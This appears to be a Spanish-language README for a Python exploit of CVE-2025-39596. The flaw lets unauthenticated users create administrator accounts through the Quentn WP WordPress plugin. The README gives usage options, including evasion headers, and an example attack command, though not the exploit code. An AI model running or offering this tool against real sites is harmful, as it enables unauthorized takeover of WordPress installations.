
Quentn WP <= 1.2.8 - Escalada de Privilegios No Autenticada
Quentn WP <= 1.2.8 - Escalada de privilegios sin autenticación
El complemento Quentn WP para WordPress es vulnerable a la escalada de privilegios en todas las versiones hasta la 1.2.8, inclusive. Esto permite a los atacantes no autenticados escalar sus privilegios al nivel de administrador.
CVE-2025-395969.8 (Critical)Este repositorio contiene un exploit en Python para CVE-2025-39596, que permite la creación de un nuevo usuario administrador de WordPress sin autenticación mediante una solicitud API manipulada.
Características:
python3 CVE-2025-39596.py -u <target_url> -e <email> [options]
Argumentos requeridos:
-u, --url URL del sitio WordPress de destino (p. ej., http://127.0.0.1/wordpress)-e, --email Correo electrónico para la nueva cuenta de administradorArgumentos opcionales:
-f, --fname Nombre (por defecto: Pwn)-l, --lname Apellido (por defecto: Admin)-r, --role Rol a asignar (por defecto: administrator)-k, --key Clave de API de Quentn si se conoce--cookie Cookie para omisión autenticada si está disponible--proxy Soporte de proxy (p. ej., http://127.0.0.1:8080)--skip-ssl Omitir verificación SSL--extra Habilitar cabeceras de evasión adicionalesEjemplo:
python3 CVE-2025-39596.py -u http://target.com/wordpress -e [email protected] --fname Root --lname User --proxy http://127.0.0.1:8080 --extra
Exploit Success By | NxploitedEsta herramienta se proporciona únicamente con fines educativos y de pruebas de seguridad autorizadas.
Cualquier uso indebido está estrictamente prohibido.
El autor no es responsable de ningún daño o uso indebido causado por este código.
Por: Nxploited ( Khaled Alenazi )